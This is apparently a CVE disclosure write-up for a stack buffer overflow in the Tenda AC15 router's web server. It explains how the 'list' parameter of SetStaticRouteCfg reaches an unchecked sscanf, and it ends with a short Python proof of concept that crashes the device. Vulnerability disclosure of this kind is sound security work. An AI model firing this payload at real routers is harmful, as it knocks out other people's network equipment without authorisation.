CVE-2022-44168: IoT_vuln/Tenda/AC15/fromSetRouteStatic at main · RobinWang825/IoT_vuln
Tenda AC15 V15.03.05.18 is vulnerable to Buffer Overflow via function fromSetRouteStatic…
Tenda AC15(V15.03.05.18) has a Buffer Overflow Vulnerability****Product
- product information: https://www.tenda.com.cn/
- firmware download:https://www.tenda.com.cn/download/detail-2710.html
Affected version
The stack overfow vulnerability is in /bin/httpd. The vulnerability occurrs in the fromSetRouteStatic function, which can be accessed through the URL goform/SetStaticRouteCfg.
In function fromSetRouteStatic, the content obtained by the program from the parameter list is passed to v5, and then the v5 is passed into the sub_78530 function as the second argument.
In sub_78530 function, the function sscanf is called to split it and copy to stack buffer without checking its length.
Poc of Denial of Service(DoS)
import requests data = { b"list": b’A’*0x400+b’,A,A,A’ } res = requests.post("", data=data) print(res.content)